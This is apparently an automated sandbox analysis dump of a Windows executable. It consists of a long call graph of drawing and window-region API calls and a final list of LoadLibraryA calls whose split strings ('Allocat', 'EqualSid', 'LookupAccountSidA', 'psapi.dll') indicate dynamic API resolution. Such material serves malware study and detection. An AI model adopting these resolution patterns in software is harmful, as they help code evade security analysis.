402c71 CopyRect 3183->3184 3426 404850 3184->3426 3186 402c91 CopyRect 3187 403e10 7 API calls 3186->3187 3188 402cb1 CopyRect 3187->3188 3427 404850 3188->3427 3190 402cd1 CopyRect 3191 403e10 7 API calls 3190->3191 3192 402cf1 CopyRect 3191->3192 3428 404850 3192->3428 3194 402d11 CopyRect 3195 403e10 7 API calls 3194->3195 3196 402d31 CopyRect 3195->3196 3429 404850 3196->3429 3198 402d51 CopyRect 3199 403e10 7 API calls 3198->3199 3200 402d71 CopyRect 3199->3200 3430 404850 3200->3430 3202 402d91 CopyRect 3203 403e10 7 API calls 3202->3203 3204 402db1 CopyRect 3203->3204 3431 404850 3204->3431 3206 402dd1 CopyRect 3207 403e10 7 API calls 3206->3207 3208 402df1 CopyRect 3207->3208 3432 404850 3208->3432 3210 402e11 CopyRect 3211 403e10 7 API calls 3210->3211 3212 402e31 CopyRect 3211->3212 3433 404850 3212->3433 3214 402e51 CopyRect 3215 403e10 7 API calls 3214->3215 3216 402e71 CopyRect 3215->3216 3434 404850 3216->3434 3218 402e91 CopyRect 3219 403e10 7 API calls 3218->3219 3220 402eb1 CopyRect 3219->3220 3435 404850 3220->3435 3222 402ed1 CopyRect 3223 403e10 7 API calls 3222->3223 3224 402ef1 CopyRect 3223->3224 3436 404850 3224->3436 3226 402f11 CopyRect 3227 403e10 7 API calls 3226->3227 3228 402f31 CopyRect 3227->3228 3437 404850 3228->3437 3230 402f51 CopyRect 3231 403e10 7 API calls 3230->3231 3232 402f71 CopyRect 3231->3232 3438 404850 3232->3438 3234 402f91 CopyRect 3235 403e10 7 API calls 3234->3235 3236 402fb1 CopyRect 3235->3236 3439 404850 3236->3439 3238 402fd1 CopyRect 3239 403e10 7 API calls 3238->3239 3240 402ff1 CopyRect 3239->3240 3440 404850 3240->3440 3242 403011 CopyRect 3243 403e10 7 API calls 3242->3243 3244 403031 CopyRect 3243->3244 3441 404850 3244->3441 3246 403051 CopyRect 3247 403e10 7 API calls 3246->3247 3248 403071 CopyRect 3247->3248 3442 404850 3248->3442 3250 403091 CopyRect 3251 403e10 7 API calls 3250->3251 3252 4030b1 CopyRect 3251->3252 3443 404850 3252->3443 3254 4030d1 CopyRect 3255 403e10 7 API calls 3254->3255 3256 4030f1 CopyRect 3255->3256 3444 404850 3256->3444 3258 403111 CopyRect 3259 403e10 7 API calls 3258->3259 3260 403131 CopyRect 3259->3260 3445 404850 3260->3445 3262 403151 CopyRect 3263 403e10 7 API calls 3262->3263 3264 403171 CopyRect 3263->3264 3446 404850 3264->3446 3266 403191 CopyRect 3267 403e10 7 API calls 3266->3267 3268 4031b1 CopyRect 3267->3268 3447 404850 3268->3447 3270 4031d1 CopyRect 3271 403e10 7 API calls 3270->3271 3272 4031f1 CopyRect 3271->3272 3448 404850 3272->3448 3274 403211 CopyRect 3275 403e10 7 API calls 3274->3275 3276 403231 CopyRect 3275->3276 3449 404850 3276->3449 3278 403251 CopyRect 3279 403e10 7 API calls 3278->3279 3280 403271 CopyRect 3279->3280 3450 404850 3280->3450 3282 403291 CopyRect 3283 403e10 7 API calls 3282->3283 3284 4032b1 CopyRect 3283->3284 3451 404850 3284->3451 3286 4032d1 CopyRect 3287 403e10 7 API calls 3286->3287 3288 4032f1 CopyRect 3287->3288 3452 404850 3288->3452 3290 403311 CopyRect 3291 403e10 7 API calls 3290->3291 3292 403331 CopyRect 3291->3292 3453 404850 3292->3453 3294 403351 CopyRect 3295 403e10 7 API calls 3294->3295 3296 403371 CopyRect 3295->3296 3454 404850 3296->3454 3298 403391 CopyRect 3299 403e10 7 API calls 3298->3299 3300 4033b1 CopyRect 3299->3300 3455 404850 3300->3455 3302 4033d1 CopyRect 3303 403e10 7 API calls 3302->3303 3304 4033f1 CopyRect 3303->3304 3456 404850 3304->3456 3306 403411 CopyRect 3307 403e10 7 API calls 3306->3307 3308 403431 CopyRect 3307->3308 3457 404850 3308->3457 3310 403451 CopyRect 3311 403e10 7 API calls 3310->3311 3312 403471 CopyRect 3311->3312 3458 404850 3312->3458 3314 403491 CopyRect 3315 403e10 7 API calls 3314->3315 3316 4034b1 CopyRect 3315->3316 3459 404850 3316->3459 3318 4034d1 CopyRect 3319 403e10 7 API calls 3318->3319 3320 4034f1 CopyRect 3319->3320 3460 404850 3320->3460 3322 403511 CopyRect 3323 403e10 7 API calls 3322->3323 3324 403531 CopyRect 3323->3324 3461 404850 3324->3461 3326 403551 CopyRect 3327 403e10 7 API calls 3326->3327 3328 403571 CopyRect 3327->3328 3462 404850 3328->3462 3330 403591 CopyRect 3331 403e10 7 API calls 3330->3331 3332 4035b1 CopyRect 3331->3332 3463 404850 3332->3463 3334 4035d1 CopyRect 3335 403e10 7 API calls 3334->3335 3336 4035f1 CopyRect 3335->3336 3464 404850 3336->3464 3338 403611 CopyRect 3339 403e10 7 API calls 3338->3339 3340 403631 CopyRect 3339->3340 3465 404850 3340->3465 3342 403651 CopyRect 3343 403e10 7 API calls 3342->3343 3344 403671 CopyRect 3343->3344 3345 403e10 7 API calls 3344->3345 3346 403691 CopyRect 3345->3346 3466 404360 3346->3466 3348 4036b1 CopyRect 3349 403e10 7 API calls 3348->3349 3350 4036d1 CopyRect 3349->3350 3351 404360 7 API calls 3350->3351 3352 4036f1 CopyRect 3351->3352 3353 403e10 7 API calls 3352->3353 3354 403711 CopyRect 3353->3354 3355 404360 7 API calls 3354->3355 3356 403731 CopyRect 3355->3356 3357 404360 7 API calls 3356->3357 3358 403751 CopyRect 3357->3358 3359 403e10 7 API calls 3358->3359 3360 403771 CopyRect 3359->3360 3361 404360 7 API calls 3360->3361 3362 403791 CopyRect 3361->3362 3363 403e10 7 API calls 3362->3363 3364 4037b1 CopyRect 3363->3364 3365 404360 7 API calls 3364->3365 3366 4037d1 CopyRect 3365->3366 3367 403e10 7 API calls 3366->3367 3368 4037f1 CopyRect 3367->3368 3369 404360 7 API calls 3368->3369 3370 403811 CopyRect 3369->3370 3371 404360 7 API calls 3370->3371 3372 403831 CopyRect 3371->3372 3373 404360 7 API calls 3372->3373 3374 403851 CopyRect 3373->3374 3375 403e10 7 API calls 3374->3375 3376 403871 CopyRect 3375->3376 3377 403e10 7 API calls 3376->3377 3378 403891 CopyRect 3377->3378 3379 404360 7 API calls 3378->3379 3380 4038b1 CopyRect 3379->3380 3381 403e10 7 API calls 3380->3381 3382 4038d1 CopyRect 3381->3382 3383 403e10 7 API calls 3382->3383 3384 4038f1 CopyRect 3383->3384 3385 404360 7 API calls 3384->3385 3386 403911 CopyRect 3385->3386 3387 404360 7 API calls 3386->3387 3388 403931 CopyRect 3387->3388 3389 403e10 7 API calls 3388->3389 3390 403951 CopyRect 3389->3390 3391 404360 7 API calls 3390->3391 3392 403971 CopyRect 3391->3392 3393 404360 7 API calls 3392->3393 3394 403991 CopyRect 3393->3394 3395 404360 7 API calls 3394->3395 3396 4039b1 SetWindowRgn SetCapture 3395->3396 3396->3064 3397->3070 3398->3074 3399->3078 3400->3082 3401->3086 3402->3090 3403->3094 3404->3098 3405->3102 3406->3106 3407->3110 3408->3114 3409->3118 3410->3122 3411->3126 3412->3130 3413->3134 3414->3138 3415->3142 3416->3146 3417->3150 3418->3154 3419->3158 3420->3162 3421->3166 3422->3170 3423->3174 3424->3178 3425->3182 3426->3186 3427->3190 3428->3194 3429->3198 3430->3202 3431->3206 3432->3210 3433->3214 3434->3218 3435->3222 3436->3226 3437->3230 3438->3234 3439->3238 3440->3242 3441->3246 3442->3250 3443->3254 3444->3258 3445->3262 3446->3266 3447->3270 3448->3274 3449->3278 3450->3282 3451->3286 3452->3290 3453->3294 3454->3298 3455->3302 3456->3306 3457->3310 3458->3314 3459->3318 3460->3322 3461->3326 3462->3330 3463->3334 3464->3338 3465->3342 3467 4043a3 3466->3467 3468 40454a 3467->3468 3472 4044e9 _ftol _ftol 3467->3472 3469 404560 CreatePolygonRgn 3468->3469 3470 4045cb CreatePolygonRgn 3468->3470 3471 404570 3469->3471 3476 4045d9 3470->3476 3473 40457b CombineRgn CreatePolygonRgn 3471->3473 3472->3468 3472->3472 3474 40ae02 3473->3474 3475 40459f CombineRgn 3474->3475 3475->3476 3476->3348 3478 40a940 GetWindowRect 3479 40aa54 ClientToScreen 3478->3479 3480 40a99f 3478->3480 3482 40aa52 3479->3482 3480->3482 3490 4052c0 CopyRect 3480->3490 3483 40a9d0 _ftol 3483->3482 3484 40a9ec 3483->3484 3484->3482 3485 40aa08 GetWindowRect 3484->3485 3486 40aa1f 3485->3486 3487 405300 42 API calls 3486->3487 3488 40aa30 SetWindowRgn 3487->3488 3491 40a440 IsIconic 3488->3491 3490->3483 3492 40a474 3491->3492 3494 40a50d 3491->3494 3493 40a481 SendMessageA GetSystemMetrics GetSystemMetrics GetClientRect DrawIcon 3492->3493 3508 40a508 3493->3508 3495 40a593 CreateCompatibleDC 3494->3495 3507 40a640 3494->3507 3494->3508 3496 40b05a 3495->3496 3498 40a5b2 LPtoDP CreateCompatibleBitmap 3496->3498 3497 40a65a GetWindowRect 3499 40a67d 3497->3499 3500 40a5ef 3498->3500 3509 404a40 CopyRect 3499->3509 3503 40a5fd GetMapMode 3500->3503 3502 40a68e 3505 40a6ad BitBlt 3502->3505 3502->3508 3504 40b054 3503->3504 3506 40a616 DPtoLP 3504->3506 3505->3508 3506->3507 3507->3497 3508->3482 3510 4039c0 3 API calls 3509->3510 3511 404a71 CopyRect 3510->3511 3512 4039c0 3 API calls 3511->3512 3513 404a91 CopyRect 3512->3513 3514 4039c0 3 API calls 3513->3514 3515 404ab1 CopyRect 3514->3515 3516 4039c0 3 API calls 3515->3516 3517 404ad1 CopyRect 3516->3517 3518 4039c0 3 API calls 3517->3518 3519 404af1 CopyRect 3518->3519 3520 4039c0 3 API calls 3519->3520 3521 404b11 CopyRect 3520->3521 3522 4039c0 3 API calls 3521->3522 3523 404b31 CopyRect 3522->3523 3524 4039c0 3 API calls 3523->3524 3525 404b51 CopyRect 3524->3525 3526 4039c0 3 API calls 3525->3526 3527 404b71 CopyRect 3526->3527 3528 4039c0 3 API calls 3527->3528 3529 404b91 CopyRect 3528->3529 3530 4039c0 3 API calls 3529->3530 3531 404bb1 CopyRect 3530->3531 3532 4039c0 3 API calls 3531->3532 3533 404bd1 CopyRect 3532->3533 3534 4039c0 3 API calls 3533->3534 3535 404bf1 CopyRect 3534->3535 3536 4039c0 3 API calls 3535->3536 3537 404c11 CopyRect 3536->3537 3538 4039c0 3 API calls 3537->3538 3539 404c31 CopyRect 3538->3539 3540 4039c0 3 API calls 3539->3540 3541 404c51 CopyRect 3540->3541 3542 4039c0 3 API calls 3541->3542 3543 404c71 CopyRect 3542->3543 3544 4039c0 3 API calls 3543->3544 3545 404c91 CopyRect 3544->3545 3546 4039c0 3 API calls 3545->3546 3547 404cb1 CopyRect 3546->3547 3548 4039c0 3 API calls 3547->3548 3549 404cd1 CopyRect 3548->3549 3550 4039c0 3 API calls 3549->3550 3551 404cf1 CopyRect 3550->3551 3552 4039c0 3 API calls 3551->3552 3553 404d11 CopyRect 3552->3553 3554 4039c0 3 API calls 3553->3554 3555 404d31 CopyRect 3554->3555 3556 4039c0 3 API calls 3555->3556 3557 404d51 CopyRect 3556->3557 3558 4039c0 3 API calls 3557->3558 3559 404d71 CopyRect 3558->3559 3560 4039c0 3 API calls 3559->3560 3561 404d91 CopyRect 3560->3561 3562 4039c0 3 API calls 3561->3562 3563 404db1 CopyRect 3562->3563 3564 4039c0 3 API calls 3563->3564 3565 404dd1 CopyRect 3564->3565 3566 4039c0 3 API calls 3565->3566 3567 404df1 CopyRect 3566->3567 3568 4039c0 3 API calls 3567->3568 3569 404e11 CopyRect 3568->3569 3570 4039c0 3 API calls 3569->3570 3571 404e31 CopyRect 3570->3571 3572 4039c0 3 API calls 3571->3572 3573 404e51 CopyRect 3572->3573 3574 4039c0 3 API calls 3573->3574 3575 404e71 CopyRect 3574->3575 3576 4039c0 3 API calls 3575->3576 3577 404e91 CopyRect 3576->3577 3578 4039c0 3 API calls 3577->3578 3579 404eb1 3578->3579 3579->3502 3588 40ad00 DrawTextA 2567 40b10f __set_app_type __p__fmode __p__commode 2568 40b17e 2567->2568 2569 40b192 2568->2569 2570 40b186 __setusermatherr 2568->2570 2579 40b280 _controlfp 2569->2579 2570->2569 2572 40b197 _initterm __getmainargs _initterm 2573 40b1eb GetStartupInfoA 2572->2573 2575 40b21f GetModuleHandleA 2573->2575 2580 40b2a2 69CE4ED0 2575->2580 2578 40b243 exit _XcptFilter 2579->2572 2580->2578 2581 40ac50 TextOutA 2583 40a810 2587 409c60 2583->2587 2585 40a838 ReleaseCapture GetWindowRect 2586 40a863 2585->2586 2588 409c6c 2587->2588 2588->2585 2589 40ac10 PtVisible 3602 40a190 3603 40a198 ReleaseCapture 3602->3603 2590 409e20 2591 409e47 2590->2591 2592 409eaf CreateCompatibleDC 2591->2592 2604 409f5c 2591->2604 2594 40b05a 2592->2594 2593 409f76 GetWindowRect 2595 409f99 2593->2595 2596 409ece LPtoDP CreateCompatibleBitmap 2594->2596 2606 401040 CopyRect 2595->2606 2597 409f0b 2596->2597 2600 409f19 GetMapMode 2597->2600 2599 409fab 2603 409fc3 BitBlt 2599->2603 2605 40a009 2599->2605 2601 40b054 2600->2601 2602 409f32 DPtoLP 2601->2602 2602->2604 2603->2605 2604->2593 2937 4039c0 2606->2937 2608 401071 CopyRect 2943 404670 2608->2943 2610 401091 CopyRect 2611 4039c0 3 API calls 2610->2611 2612 4010b1 CopyRect 2611->2612 2613 404670 3 API calls 2612->2613 2614 4010d1 CopyRect 2613->2614 2615 4039c0 3 API calls 2614->2615 2616 4010f1 CopyRect 2615->2616 2617 404670 3 API calls 2616->2617 2618 401111 CopyRect 2617->2618 2619 4039c0 3 API calls 2618->2619 2620 401131 CopyRect 2619->2620 2621 404670 3 API calls 2620->2621 2622 401151 CopyRect 2621->2622 2623 4039c0 3 API calls 2622->2623 2624 401171 CopyRect 2623->2624 2625 404670 3 API calls 2624->2625 2626 401191 CopyRect 2625->2626 2627 4039c0 3 API calls 2626->2627 2628 4011b1 CopyRect 2627->2628 2629 404670 3 API calls 2628->2629 2630 4011d1 CopyRect 2629->2630 2631 4039c0 3 API calls 2630->2631 2632 4011f1 CopyRect 2631->2632 2633 404670 3 API calls 2632->2633 2634 401211 CopyRect 2633->2634 2635 4039c0 3 API calls 2634->2635 2636 401231 CopyRect 2635->2636 2637 404670 3 API calls 2636->2637 2638 401251 CopyRect 2637->2638 2639 4039c0 3 API calls 2638->2639 2640 401271 CopyRect 2639->2640 2641 404670 3 API calls 2640->2641 2642 401291 CopyRect 2641->2642 2643 4039c0 3 API calls 2642->2643 2644 4012b1 CopyRect 2643->2644 2645 404670 3 API calls 2644->2645 2646 4012d1 CopyRect 2645->2646 2647 4039c0 3 API calls 2646->2647 2648 4012f1 CopyRect 2647->2648 2649 404670 3 API calls 2648->2649 2650 401311 CopyRect 2649->2650 2651 4039c0 3 API calls 2650->2651 2652 401331 CopyRect 2651->2652 2653 404670 3 API calls 2652->2653 2654 401351 CopyRect 2653->2654 2655 4039c0 3 API calls 2654->2655 2656 401371 CopyRect 2655->2656 2657 404670 3 API calls 2656->2657 2658 401391 CopyRect 2657->2658 2659 4039c0 3 API calls 2658->2659 2660 4013b1 CopyRect 2659->2660 2661 404670 3 API calls 2660->2661 2662 4013d1 CopyRect 2661->2662 2663 4039c0 3 API calls 2662->2663 2664 4013f1 CopyRect 2663->2664 2665 404670 3 API calls 2664->2665 2666 401411 CopyRect 2665->2666 2667 4039c0 3 API calls 2666->2667 2668 401431 CopyRect 2667->2668 2669 404670 3 API calls 2668->2669 2670 401451 CopyRect 2669->2670 2671 4039c0 3 API calls 2670->2671 2672 401471 CopyRect 2671->2672 2673 404670 3 API calls 2672->2673 2674 401491 CopyRect 2673->2674 2675 4039c0 3 API calls 2674->2675 2676 4014b1 CopyRect 2675->2676 2677 404670 3 API calls 2676->2677 2678 4014d1 CopyRect 2677->2678 2679 4039c0 3 API calls 2678->2679 2680 4014f1 CopyRect 2679->2680 2681 404670 3 API calls 2680->2681 2682 401511 CopyRect 2681->2682 2683 4039c0 3 API calls 2682->2683 2684 401531 CopyRect 2683->2684 2685 404670 3 API calls 2684->2685 2686 401551 CopyRect 2685->2686 2687 4039c0 3 API calls 2686->2687 2688 401571 CopyRect 2687->2688 2689 404670 3 API calls 2688->2689 2690 401591 CopyRect 2689->2690 2691 4039c0 3 API calls 2690->2691 2692 4015b1 CopyRect 2691->2692 2693 404670 3 API calls 2692->2693 2694 4015d1 CopyRect 2693->2694 2695 4039c0 3 API calls 2694->2695 2696 4015f1 CopyRect 2695->2696 2697 404670 3 API calls 2696->2697 2698 401611 CopyRect 2697->2698 2699 4039c0 3 API calls 2698->2699 2700 401631 CopyRect 2699->2700 2701 404670 3 API calls 2700->2701 2702 401651 CopyRect 2701->2702 2703 4039c0 3 API calls 2702->2703 2704 401671 CopyRect 2703->2704 2705 404670 3 API calls 2704->2705 2706 401691 CopyRect 2705->2706 2707 4039c0 3 API calls 2706->2707 2708 4016b1 CopyRect 2707->2708 2709 404670 3 API calls 2708->2709 2710 4016d1 CopyRect 2709->2710 2711 4039c0 3 API calls 2710->2711 2712 4016f1 CopyRect 2711->2712 2713 404670 3 API calls 2712->2713 2714 401711 CopyRect 2713->2714 2715 4039c0 3 API calls 2714->2715 2716 401731 CopyRect 2715->2716 2717 404670 3 API calls 2716->2717 2718 401751 CopyRect 2717->2718 2719 4039c0 3 API calls 2718->2719 2720 401771 CopyRect 2719->2720 2721 404670 3 API calls 2720->2721 2722 401791 CopyRect 2721->2722 2723 4039c0 3 API calls 2722->2723 2724 4017b1 CopyRect 2723->2724 2725 404670 3 API calls 2724->2725 2726 4017d1 CopyRect 2725->2726 2727 4039c0 3 API calls 2726->2727 2728 4017f1 CopyRect 2727->2728 2729 404670 3 API calls 2728->2729 2730 401811 CopyRect 2729->2730 2731 4039c0 3 API calls 2730->2731 2732 401831 CopyRect 2731->2732 2733 404670 3 API calls 2732->2733 2734 401851 CopyRect 2733->2734 2735 4039c0 3 API calls 2734->2735 2736 401871 CopyRect 2735->2736 2737 404670 3 API calls 2736->2737 2738 401891 CopyRect 2737->2738 2739 4039c0 3 API calls 2738->2739 2740 4018b1 CopyRect 2739->2740 2741 404670 3 API calls 2740->2741 2742 4018d1 CopyRect 2741->2742 2743 4039c0 3 API calls 2742->2743 2744 4018f1 CopyRect 2743->2744 2745 404670 3 API calls 2744->2745 2746 401911 CopyRect 2745->2746 2747 4039c0 3 API calls 2746->2747 2748 401931 CopyRect 2747->2748 2749 404670 3 API calls 2748->2749 2750 401951 CopyRect 2749->2750 2751 4039c0 3 API calls 2750->2751 2752 401971 CopyRect 2751->2752 2753 404670 3 API calls 2752->2753 2754 401991 CopyRect 2753->2754 2755 4039c0 3 API calls 2754->2755 2756 4019b1 CopyRect 2755->2756 2757 404670 3 API calls 2756->2757 2758 4019d1 CopyRect 2757->2758 2759 4039c0 3 API calls 2758->2759 2760 4019f1 CopyRect 2759->2760 2761 404670 3 API calls 2760->2761 2762 401a11 CopyRect 2761->2762 2763 4039c0 3 API calls 2762->2763 2764 401a31 CopyRect 2763->2764 2765 404670 3 API calls 2764->2765 2766 401a51 CopyRect 2765->2766 2767 4039c0 3 API calls 2766->2767 2768 401a71 CopyRect 2767->2768 2769 404670 3 API calls 2768->2769 2770 401a91 CopyRect 2769->2770 2771 4039c0 3 API calls 2770->2771 2772 401ab1 CopyRect 2771->2772 2773 404670 3 API calls 2772->2773 2774 401ad1 CopyRect 2773->2774 2775 4039c0 3 API calls 2774->2775 2776 401af1 CopyRect 2775->2776 2777 404670 3 API calls 2776->2777 2778 401b11 CopyRect 2777->2778 2779 4039c0 3 API calls 2778->2779 2780 401b31 CopyRect 2779->2780 2781 404670 3 API calls 2780->2781 2782 401b51 CopyRect 2781->2782 2783 4039c0 3 API calls 2782->2783 2784 401b71 CopyRect 2783->2784 2785 404670 3 API calls 2784->2785 2786 401b91 CopyRect 2785->2786 2787 4039c0 3 API calls 2786->2787 2788 401bb1 CopyRect 2787->2788 2789 404670 3 API calls 2788->2789 2790 401bd1 CopyRect 2789->2790 2791 4039c0 3 API calls 2790->2791 2792 401bf1 CopyRect 2791->2792 2793 404670 3 API calls 2792->2793 2794 401c11 CopyRect 2793->2794 2795 4039c0 3 API calls 2794->2795 2796 401c31 CopyRect 2795->2796 2797 404670 3 API calls 2796->2797 2798 401c51 CopyRect 2797->2798 2799 4039c0 3 API calls 2798->2799 2800 401c71 CopyRect 2799->2800 2801 404670 3 API calls 2800->2801 2802 401c91 CopyRect 2801->2802 2803 4039c0 3 API calls 2802->2803 2804 401cb1 CopyRect 2803->2804 2805 404670 3 API calls 2804->2805 2806 401cd1 CopyRect 2805->2806 2807 4039c0 3 API calls 2806->2807 2808 401cf1 CopyRect 2807->2808 2809 404670 3 API calls 2808->2809 2810 401d11 CopyRect 2809->2810 2811 4039c0 3 API calls 2810->2811 2812 401d31 CopyRect 2811->2812 2813 404670 3 API calls 2812->2813 2814 401d51 CopyRect 2813->2814 2815 4039c0 3 API calls 2814->2815 2816 401d71 CopyRect 2815->2816 2817 404670 3 API calls 2816->2817 2818 401d91 CopyRect 2817->2818 2819 4039c0 3 API calls 2818->2819 2820 401db1 CopyRect 2819->2820 2821 404670 3 API calls 2820->2821 2822 401dd1 CopyRect 2821->2822 2823 4039c0 3 API calls 2822->2823 2824 401df1 CopyRect 2823->2824 2825 404670 3 API calls 2824->2825 2826 401e11 CopyRect 2825->2826 2827 4039c0 3 API calls 2826->2827 2828 401e31 CopyRect 2827->2828 2829 404670 3 API calls 2828->2829 2830 401e51 CopyRect 2829->2830 2831 4039c0 3 API calls 2830->2831 2832 401e71 CopyRect 2831->2832 2833 404670 3 API calls 2832->2833 2834 401e91 CopyRect 2833->2834 2835 4039c0 3 API calls 2834->2835 2836 401eb1 CopyRect 2835->2836 2837 404670 3 API calls 2836->2837 2838 401ed1 CopyRect 2837->2838 2839 4039c0 3 API calls 2838->2839 2840 401ef1 CopyRect 2839->2840 2841 404670 3 API calls 2840->2841 2842 401f11 CopyRect 2841->2842 2843 4039c0 3 API calls 2842->2843 2844 401f31 CopyRect 2843->2844 2845 404670 3 API calls 2844->2845 2846 401f51 CopyRect 2845->2846 2847 4039c0 3 API calls 2846->2847 2848 401f71 CopyRect 2847->2848 2849 404670 3 API calls 2848->2849 2850 401f91 CopyRect 2849->2850 2851 4039c0 3 API calls 2850->2851 2852 401fb1 CopyRect 2851->2852 2853 404670 3 API calls 2852->2853 2854 401fd1 CopyRect 2853->2854 2855 4039c0 3 API calls 2854->2855 2856 401ff1 CopyRect 2855->2856 2857 404670 3 API calls 2856->2857 2858 402011 CopyRect 2857->2858 2859 4039c0 3 API calls 2858->2859 2860 402031 CopyRect 2859->2860 2861 404670 3 API calls 2860->2861 2862 402051 CopyRect 2861->2862 2863 4039c0 3 API calls 2862->2863 2864 402071 CopyRect 2863->2864 2865 404670 3 API calls 2864->2865 2866 402091 CopyRect 2865->2866 2867 4039c0 3 API calls 2866->2867 2868 4020b1 CopyRect 2867->2868 2869 404670 3 API calls 2868->2869 2870 4020d1 CopyRect 2869->2870 2871 4039c0 3 API calls 2870->2871 2872 4020f1 CopyRect 2871->2872 2873 404670 3 API calls 2872->2873 2874 402111 CopyRect 2873->2874 2875 4039c0 3 API calls 2874->2875 2876 402131 CopyRect 2875->2876 2877 404670 3 API calls 2876->2877 2878 402151 CopyRect 2877->2878 2879 4039c0 3 API calls 2878->2879 2880 402171 CopyRect 2879->2880 2881 404670 3 API calls 2880->2881 2882 402191 CopyRect 2881->2882 2883 4039c0 3 API calls 2882->2883 2884 4021b1 CopyRect 2883->2884 2885 4039c0 3 API calls 2884->2885 2886 4021d1 CopyRect 2885->2886 2949 4040f0 2886->2949 2888 4021f1 CopyRect 2889 4039c0 3 API calls 2888->2889 2890 402211 CopyRect 2889->2890 2891 4040f0 3 API calls 2890->2891 2892 402231 CopyRect 2891->2892 2893 4039c0 3 API calls 2892->2893 2894 402251 CopyRect 2893->2894 2895 4040f0 3 API calls 2894->2895 2896 402271 CopyRect 2895->2896 2897 4040f0 3 API calls 2896->2897 2898 402291 CopyRect 2897->2898 2899 4039c0 3 API calls 2898->2899 2900 4022b1 CopyRect 2899->2900 2901 4040f0 3 API calls 2900->2901 2902 4022d1 CopyRect 2901->2902 2903 4039c0 3 API calls 2902->2903 2904 4022f1 CopyRect 2903->2904 2905 4040f0 3 API calls 2904->2905 2906 402311 CopyRect 2905->2906 2907 4039c0 3 API calls 2906->2907 2908 402331 CopyRect 2907->2908 2909 4040f0 3 API calls 2908->2909 2910 402351 CopyRect 2909->2910 2911 4040f0 3 API calls 2910->2911 2912 402371 CopyRect 2911->2912 2913 4040f0 3 API calls 2912->2913 2914 402391 CopyRect 2913->2914 2915 4039c0 3 API calls 2914->2915 2916 4023b1 CopyRect 2915->2916 2917 4039c0 3 API calls 2916->2917 2918 4023d1 CopyRect 2917->2918 2919 4040f0 3 API calls 2918->2919 2920 4023f1 CopyRect 2919->2920 2921 4039c0 3 API calls 2920->2921 2922 402411 CopyRect 2921->2922 2923 4039c0 3 API calls 2922->2923 2924 402431 CopyRect 2923->2924 2925 4040f0 3 API calls 2924->2925 2926 402451 CopyRect 2925->2926 2927 4040f0 3 API calls 2926->2927 2928 402471 CopyRect 2927->2928 2929 4039c0 3 API calls 2928->2929 2930 402491 CopyRect 2929->2930 2931 4040f0 3 API calls 2930->2931 2932 4024b1 CopyRect 2931->2932 2933 4040f0 3 API calls 2932->2933 2934 4024d1 CopyRect 2933->2934 2935 4040f0 3 API calls 2934->2935 2936 4024f1 2935->2936 2936->2599 2938 4039f4 2937->2938 2939 403b03 _ftol _ftol 2938->2939 2940 403b5e 2938->2940 2942 403bac 2938->2942 2939->2939 2939->2940 2941 403b90 Polygon 2940->2941 2941->2942 2942->2608 2944 4046a5 2943->2944 2945 404776 _ftol _ftol 2944->2945 2946 4047d8 2944->2946 2948 404805 2944->2948 2945->2945 2945->2946 2947 4047eb Polyline 2946->2947 2947->2948 2948->2610 2950 40412b 2949->2950 2951 40423e _ftol _ftol 2950->2951 2952 404299 2950->2952 2954 4042ed 2950->2954 2951->2951 2951->2952 2953 4042c9 PolyPolygon 2952->2953 2953->2954 2954->2888 3604 40ada0 EnableWindow 3605 40a7a0 GetWindowRect 3606 40a7c1 3605->3606 3607 404ec0 24 API calls 3606->3607 3608 40a7e1 SetCapture 3607->3608 3609 40a7f4 3608->3609 2582 40b261 _exit 3047 40b2e3 3048 40b2e8 3047->3048 3051 40b2ba 3048->3051 3052 40b2bf 3051->3052 3053 40b2d4 _setmbcp 3052->3053 3054 40b2dd 3052->3054 3053->3054 2334 405830 2337 40a1b0 2334->2337 2336 405856 2338 40a1d9 2337->2338 2339 40a1fd LoadIconA 2338->2339 2339->2336 2955 40ac30 RectVisible 3477 40acb0 TabbedTextOutA 3580 40a170 3583 40a090 3580->3583 3582 40a178 3584 40a0c8 BitBlt 3583->3584 3586 40a105 3583->3586 3584->3586 3586->3582 3587 40ad70 Escape 3589 40ad30 3590 40ad38 3589->3590 3591 40ad3b GrayStringA 3589->3591 3590->3591 3592 4057f0 3593 4057f5 3592->3593 3596 40b0c8 3593->3596 3599 40b09c 3596->3599 3598 40581a 3600 40b0b1 __dllonexit 3599->3600 3601 40b0a5 _onexit 3599->3601 3600->3598 3601->3598
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074E7
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004074EA
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074FD
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407500
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407563
                                                                        • LoadLibraryA.KERNELBASE(00000073,StcF), ref: 0040764D
                                                                        • LoadLibraryA.KERNEL32(00000073,StcF), ref: 00407666
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040767C
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040768F
                                                                        • LoadLibraryA.KERNEL32(advapi,RuV), ref: 0040769F
                                                                        • LoadLibraryA.KERNEL32(advapi,RuV), ref: 004076B5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076C5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076D5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076E5
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077AC
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077BC
                                                                        • LoadLibraryA.KERNEL32(advapi,0000004F), ref: 004077CC
                                                                        • LoadLibraryA.KERNEL32(advapi,?), ref: 004077E2
                                                                        • LoadLibraryA.KERNEL32(advapi,Allocat), ref: 004077F8
                                                                        • LoadLibraryA.KERNEL32(advapi,EqualSid), ref: 0040780E
                                                                        • LoadLibraryA.KERNEL32(advapi,LookupAccountSidA), ref: 00407824
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 0040783A
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 0040784A
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 00407860
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407876
                                                                        • LoadLibraryA.KERNELBASE(psapi.dll,?), ref: 00407A43
                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00407AFB
                                                                        • wcscpy.MSVCRT ref: 00407B17
                                                                        • wcscpy.MSVCRT ref: 00407F50
                                                                        • wcscat.MSVCRT ref: 00407F7A
